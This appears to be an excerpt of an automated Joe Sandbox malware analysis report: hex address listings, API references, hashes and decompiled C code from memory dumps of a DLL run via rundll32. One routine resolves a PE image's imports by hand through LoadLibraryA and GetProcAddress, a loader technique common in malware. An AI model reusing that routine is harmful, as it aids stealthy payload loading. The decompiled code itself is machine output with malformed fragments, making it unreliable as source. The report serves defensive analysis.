                                                                                                                                                                                                                                                                            0x10014986
                                                                                                                                                                                                                                                                            0x10014988
                                                                                                                                                                                                                                                                            0x10014996
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1001499c
                                                                                                                                                                                                                                                                            0x100149a5
                                                                                                                                                                                                                                                                            0x100149b3
                                                                                                                                                                                                                                                                            0x100149bf
                                                                                                                                                                                                                                                                            0x100149cb
                                                                                                                                                                                                                                                                            0x100149d4
                                                                                                                                                                                                                                                                            0x100149d7
                                                                                                                                                                                                                                                                            0x100149db
                                                                                                                                                                                                                                                                            0x100149dd
                                                                                                                                                                                                                                                                            0x100149ea
                                                                                                                                                                                                                                                                            0x100149fe
                                                                                                                                                                                                                                                                            0x10014a0d
                                                                                                                                                                                                                                                                            0x10014a1e
                                                                                                                                                                                                                                                                            0x100149e7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100149e7
                                                                                                                                                                                                                                                                            0x10014a20
                                                                                                                                                                                                                                                                            0x10014a24
                                                                                                                                                                                                                                                                            0x10014a29
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014a29
                                                                                                                                                                                                                                                                            0x10014a34
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014a36
                                                                                                                                                                                                                                                                            0x10014a3a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014a3c
                                                                                                                                                                                                                                                                            0x10014860
                                                                                                                                                                                                                                                                            0x10014869
                                                                                                                                                                                                                                                                            0x10014877
                                                                                                                                                                                                                                                                            0x1001487a
                                                                                                                                                                                                                                                                            0x10014897
                                                                                                                                                                                                                                                                            0x1001489e
                                                                                                                                                                                                                                                                            0x100148b0
                                                                                                                                                                                                                                                                            0x100148b0
                                                                                                                                                                                                                                                                            0x100148b7
                                                                                                                                                                                                                                                                            0x100148c7
                                                                                                                                                                                                                                                                            0x100148df
                                                                                                                                                                                                                                                                            0x100148c9
                                                                                                                                                                                                                                                                            0x100148d1
                                                                                                                                                                                                                                                                            0x100148d1
                                                                                                                                                                                                                                                                            0x100148e2
                                                                                                                                                                                                                                                                            0x100148e6
                                                                                                                                                                                                                                                                            0x100148f6
                                                                                                                                                                                                                                                                            0x10014919
                                                                                                                                                                                                                                                                            0x1001492b
                                                                                                                                                                                                                                                                            0x100148f8
                                                                                                                                                                                                                                                                            0x1001490c
                                                                                                                                                                                                                                                                            0x1001490c
                                                                                                                                                                                                                                                                            0x10014935
                                                                                                                                                                                                                                                                            0x10014951
                                                                                                                                                                                                                                                                            0x10014937
                                                                                                                                                                                                                                                                            0x10014946
                                                                                                                                                                                                                                                                            0x10014946
                                                                                                                                                                                                                                                                            0x10014959
                                                                                                                                                                                                                                                                            0x10014962
                                                                                                                                                                                                                                                                            0x10014962
                                                                                                                                                                                                                                                                            0x10014970
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100148b9
                                                                                                                                                                                                                                                                            0x100148bb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100148bb
                                                                                                                                                                                                                                                                            0x100148b7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1001487a
                                                                                                                                                                                                                                                                            0x1001475d
                                                                                                                                                                                                                                                                            0x1001476b
                                                                                                                                                                                                                                                                            0x10014770
                                                                                                                                                                                                                                                                            0x1001477b
                                                                                                                                                                                                                                                                            0x1001477e
                                                                                                                                                                                                                                                                            0x10014782
                                                                                                                                                                                                                                                                            0x10014784
                                                                                                                                                                                                                                                                            0x10014794
                                                                                                                                                                                                                                                                            0x1001479d
                                                                                                                                                                                                                                                                            0x100147a6
                                                                                                                                                                                                                                                                            0x100147ae
                                                                                                                                                                                                                                                                            0x100147b7
                                                                                                                                                                                                                                                                            0x100147c2
                                                                                                                                                                                                                                                                            0x100147c8
                                                                                                                                                                                                                                                                            0x100147cb
                                                                                                                                                                                                                                                                            0x100147ce
                                                                                                                                                                                                                                                                            0x100147d5
                                                                                                                                                                                                                                                                            0x100147dc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100147e7
                                                                                                                                                                                                                                                                            0x100147f5
                                                                                                                                                                                                                                                                            0x10014800
                                                                                                                                                                                                                                                                            0x1001480a
                                                                                                                                                                                                                                                                            0x10014822
                                                                                                                                                                                                                                                                            0x1001482f
                                                                                                                                                                                                                                                                            0x1001482f
                                                                                                                                                                                                                                                                            0x1001480c
                                                                                                                                                                                                                                                                            0x10014817
                                                                                                                                                                                                                                                                            0x10014817
                                                                                                                                                                                                                                                                            0x10014836
                                                                                                                                                                                                                                                                            0x10014836
                                                                                                                                                                                                                                                                            0x1001483e
                                                                                                                                                                                                                                                                            0x1001483e
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 10014891
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 100148AA
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 10014906
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 10014925
                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00000000), ref: 10014A16
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 10014A73
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$CurrentHandleLibraryLoadModuleProcesslstrcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2598995400-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2177c1f24ff3cde81dc3cba8acccce6a4d6644a7936ee6e42606d82185f5fa6b
                                                                                                                                                                                                                                                                            • Instruction ID: 8ce2545dcfdf1b075962a8eadafe5cd5c258ebc8f2810bbd0a540e449d7a2533
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2177c1f24ff3cde81dc3cba8acccce6a4d6644a7936ee6e42606d82185f5fa6b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CE1A074E00209DFDB50CFA8C880AADBBF1FF08354F628569E815AB361DB34E991CB55
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1000D3EB
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 1000D3F3
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1000D407
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000D482
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000D485
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000D48A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 344208780-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0d28ba521176732a0c5d5810ff6faa4146b34a4da917b14d726958c1f513da72
                                                                                                                                                                                                                                                                            • Instruction ID: 961eb39602c70f2a203f5431f7acb9ec6646a0a5302c4a3dd4ac3c3d43dc5e55
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d28ba521176732a0c5d5810ff6faa4146b34a4da917b14d726958c1f513da72
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E212CB5A00219BFDB00DFA4CC88C9FBBBDEF49294B10449AF505E7250D771AE45CB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                                                                                                            • API String ID: 0-2132903582
                                                                                                                                                                                                                                                                            • Opcode ID: 493483fb906f91a0434a20b66ccdc4e1535a435bead09ed2833b61867c36d1d8
                                                                                                                                                                                                                                                                            • Instruction ID: eb18ba607d7dd9a04e403e711ed86a94d3658e1d124d9acdc96c7653c83a5569
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 493483fb906f91a0434a20b66ccdc4e1535a435bead09ed2833b61867c36d1d8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3641F8F1A00146BBDF24CEA89C95ABF3BD5EF0A258F200525FD16DE240D679CEF09291
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                                                            			E10013CE2(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                                                                                                                            				signed int _t12;
                                                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                                            				char* _t31;
                                                                                                                                                                                                                                                                            				char* _t33;
                                                                                                                                                                                                                                                                            				char* _t35;
                                                                                                                                                                                                                                                                            				char* _t37;
                                                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                                                            				long long* _t40;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t30 = __edi;
                                                                                                                                                                                                                                                                            				_t12 = _a20;
                                                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                                                            					_t12 = 0x11;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t35 = _a4;
                                                                                                                                                                                                                                                                            				_push(_t25);
                                                                                                                                                                                                                                                                            				 *_t40 = _a12;
                                                                                                                                                                                                                                                                            				_push(_t12);
                                                                                                                                                                                                                                                                            				_push("%.*g");
                                                                                                                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                                                                                                                            				_push(_t35);
                                                                                                                                                                                                                                                                            				L10013E3B();
                                                                                                                                                                                                                                                                            				_t23 = _t12;
                                                                                                                                                                                                                                                                            				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                                                                            					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E10013CBB(_t12, _t35);
                                                                                                                                                                                                                                                                            					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						_push(_t30);
                                                                                                                                                                                                                                                                            						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                                                                                                                            						_t31 = _t37;
                                                                                                                                                                                                                                                                            						if(_t37 == 0) {
                                                                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                                                                            							_t13 = _t23;
                                                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                                                            							return _t13;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t38 = _t37 + 1;
                                                                                                                                                                                                                                                                            						_t33 = _t31 + 2;
                                                                                                                                                                                                                                                                            						if( *_t38 == 0x2d) {
                                                                                                                                                                                                                                                                            							_t38 = _t33;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						while( *_t33 == 0x30) {
                                                                                                                                                                                                                                                                            							_t33 = _t33 + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_t33 != _t38) {
                                                                                                                                                                                                                                                                            							E100092EF(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                                                                                                                            							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t6 = _t23 + 3; // 0x100124cd
                                                                                                                                                                                                                                                                            						_t12 = _t6;
                                                                                                                                                                                                                                                                            						if(_t12 >= _a8) {
                                                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t35[_t23] = 0x302e;
                                                                                                                                                                                                                                                                            						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                                                                                                                            						_t23 = _t23 + 2;
                                                                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x10013ce2
                                                                                                                                                                                                                                                                            0x10013ce5
                                                                                                                                                                                                                                                                            0x10013cea
                                                                                                                                                                                                                                                                            0x10013cee
                                                                                                                                                                                                                                                                            0x10013cee
                                                                                                                                                                                                                                                                            0x10013cf4
                                                                                                                                                                                                                                                                            0x10013cf8
                                                                                                                                                                                                                                                                            0x10013cf9
                                                                                                                                                                                                                                                                            0x10013cfc
                                                                                                                                                                                                                                                                            0x10013cfd
                                                                                                                                                                                                                                                                            0x10013d02
                                                                                                                                                                                                                                                                            0x10013d05
                                                                                                                                                                                                                                                                            0x10013d06
                                                                                                                                                                                                                                                                            0x10013d0b
                                                                                                                                                                                                                                                                            0x10013d12
                                                                                                                                                                                                                                                                            0x10013d9b
                                                                                                                                                                                                                                                                            0x10013d9b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10013d1d
                                                                                                                                                                                                                                                                            0x10013d1e
                                                                                                                                                                                                                                                                            0x10013d30
                                                                                                                                                                                                                                                                            0x10013d56
                                                                                                                                                                                                                                                                            0x10013d56
                                                                                                                                                                                                                                                                            0x10013d5f
                                                                                                                                                                                                                                                                            0x10013d61
                                                                                                                                                                                                                                                                            0x10013d67
                                                                                                                                                                                                                                                                            0x10013d96
                                                                                                                                                                                                                                                                            0x10013d96
                                                                                                                                                                                                                                                                            0x10013d9e
                                                                                                                                                                                                                                                                            0x10013da1
                                                                                                                                                                                                                                                                            0x10013da1
                                                                                                                                                                                                                                                                            0x10013d69
                                                                                                                                                                                                                                                                            0x10013d6a
                                                                                                                                                                                                                                                                            0x10013d70
                                                                                                                                                                                                                                                                            0x10013d72
                                                                                                                                                                                                                                                                            0x10013d72
                                                                                                                                                                                                                                                                            0x10013d77
                                                                                                                                                                                                                                                                            0x10013d76
                                                                                                                                                                                                                                                                            0x10013d76
                                                                                                                                                                                                                                                                            0x10013d7e
                                                                                                                                                                                                                                                                            0x10013d8a
                                                                                                                                                                                                                                                                            0x10013d94
                                                                                                                                                                                                                                                                            0x10013d94
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10013d40
                                                                                                                                                                                                                                                                            0x10013d40
                                                                                                                                                                                                                                                                            0x10013d40
                                                                                                                                                                                                                                                                            0x10013d46
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10013d48
                                                                                                                                                                                                                                                                            0x10013d4e
                                                                                                                                                                                                                                                                            0x10013d53
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10013d53
                                                                                                                                                                                                                                                                            0x10013d30

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: strchr$_snprintf
                                                                                                                                                                                                                                                                            • String ID: %.*g
                                                                                                                                                                                                                                                                            • API String ID: 3619936089-952554281
                                                                                                                                                                                                                                                                            • Opcode ID: 286a288ee1548feab581ae243e4d75e912d28c7f784a30c9e4bd429eae58ea52
                                                                                                                                                                                                                                                                            • Instruction ID: a0cb154953dd0ca0f53bbf6e7323fc8ff70a8177b6082b7344b2c0a88ec657ea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 286a288ee1548feab581ae243e4d75e912d28c7f784a30c9e4bd429eae58ea52
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221E436604B5626E721CA18FC8AF9E37D8DF012A8F16C125FD449E181E771EDC183D1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                                                            			E10013E83(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                                                                            				signed int* _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                                                            				signed int _t112;
                                                                                                                                                                                                                                                                            				signed int _t115;
                                                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                                                            				void* _t167;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t167 = __ecx;
                                                                                                                                                                                                                                                                            				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                                                                                            					_v40 = E100094A4(_t167, _v48, "GetProcAddress");
                                                                                                                                                                                                                                                                            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                                                                                                            					_v32 = _v52;
                                                                                                                                                                                                                                                                            					_t109 = 8;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                                                                                                                            						L24:
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v56 = 0x80000000;
                                                                                                                                                                                                                                                                            					_t112 = 8;
                                                                                                                                                                                                                                                                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                                                                                                                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                            						_v8 = _v8 + 0x14;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t115 = 8;
                                                                                                                                                                                                                                                                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                                                                                                                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                            						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                                                                                                                            						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                                                                                                                            						if(_v36 != 0) {
                                                                                                                                                                                                                                                                            							if( *_v8 == 0) {
                                                                                                                                                                                                                                                                            								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                                                                                                            								_v12 =  *_t43 + _a4;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v12 =  *_v8 + _a4;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                                                                                            							while( *_v12 != 0) {
                                                                                                                                                                                                                                                                            								_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                                            								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                                                            								_v64 = _v64 & 0x00000000;
                                                                                                                                                                                                                                                                            								_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                                                            								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                                                                                                                            									_v60 =  *_v12 + _a4;
                                                                                                                                                                                                                                                                            									_v20 = _v60 + 2;
                                                                                                                                                                                                                                                                            									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                                                                                                            									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                                                                                                                            									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v24 =  *_v12;
                                                                                                                                                                                                                                                                            									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                                                            									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v24 != _v16) {
                                                                                                                                                                                                                                                                            									_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                            										 *_v12 = _v16;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_t89 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                                                                                                            										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v12 =  &(_v12[1]);
                                                                                                                                                                                                                                                                            								_v28 = _v28 + 4;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v8 = _v8 + 0x14;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t163 = 0xfffffffd;
                                                                                                                                                                                                                                                                            						return _t163;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L24;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return __eax | 0xffffffff;
                                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                                            0x10013e83
                                                                                                                                                                                                                                                                            0x10013e89
                                                                                                                                                                                                                                                                            0x10013e91
                                                                                                                                                                                                                                                                            0x10013ea6
                                                                                                                                                                                                                                                                            0x10013eb8
                                                                                                                                                                                                                                                                            0x10013ec4
                                                                                                                                                                                                                                                                            0x10013eca
                                                                                                                                                                                                                                                                            0x10013ecf
                                                                                                                                                                                                                                                                            0x10013edb
                                                                                                                                                                                                                                                                            0x10014046
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10014046
                                                                                                                                                                                                                                                                            0x10013ee1
                                                                                                                                                                                                                                                                            0x10013eea
                                                                                                                                                                                                                                                                            0x10013ef8
                                                                                                                                                                                                                                                                            0x10013efb
                                                                                                                                                                                                                                                                            0x10013f0a
                                                                                                                                                                                                                                                                            0x10013f0a
                                                                                                                                                                                                                                                                            0x10013f11
                                                                                                                                                                                                                                                                            0x10013f1f
                                                                                                                                                                                                                                                                            0x10013f22
                                                                                                                                                                                                                                                                            0x10013f32
                                                                                                                                                                                                                                                                            0x10013f3f
                                                                                                                                                                                                                                                                            0x10013f46
                                                                                                                                                                                                                                                                            0x10013f56
                                                                                                                                                                                                                                                                            0x10013f68
                                                                                                                                                                                                                                                                            0x10013f6e
                                                                                                                                                                                                                                                                            0x10013f58
                                                                                                                                                                                                                                                                            0x10013f60
                                                                                                                                                                                                                                                                            0x10013f60
                                                                                                                                                                                                                                                                            0x10013f71
                                                                                                                                                                                                                                                                            0x10013f75
                                                                                                                                                                                                                                                                            0x10013f81
                                                                                                                                                                                                                                                                            0x10013f85
                                                                                                                                                                                                                                                                            0x10013f89
                                                                                                                                                                                                                                                                            0x10013f8d
                                                                                                                                                                                                                                                                            0x10013f99
                                                                                                                                                                                                                                                                            0x10013fc4
                                                                                                                                                                                                                                                                            0x10013fcc
                                                                                                                                                                                                                                                                            0x10013fd2
                                                                                                                                                                                                                                                                            0x10013fde
                                                                                                                                                                                                                                                                            0x10013fea
                                                                                                                                                                                                                                                                            0x10013f9b
                                                                                                                                                                                                                                                                            0x10013fa0
                                                                                                                                                                                                                                                                            0x10013fab
                                                                                                                                                                                                                                                                            0x10013fb7
                                                                                                                                                                                                                                                                            0x10013fb7
                                                                                                                                                                                                                                                                            0x10013ff3
                                                                                                                                                                                                                                                                            0x10013ff9
                                                                                                                                                                                                                                                                            0x10014003
                                                                                                                                                                                                                                                                            0x1001401f
                                                                                                                                                                                                                                                                            0x10014005
                                                                                                                                                                                                                                                                            0x10014008
                                                                                                                                                                                                                                                                            0x10014014
                                                                                                                                                                                                                                                                            0x10014014
                                                                                                                                                                                                                                                                            0x10014003
                                                                                                                                                                                                                                                                            0x10014027
                                                                                                                                                                                                                                                                            0x10014030
                                                                                                                                                                                                                                                                            0x10014030
                                                                                                                                                                                                                                                                            0x1001403e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1001403e
                                                                                                                                                                                                                                                                            0x10013f4a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10013f4a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10013f22
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 10013EA0
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 10013F39
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
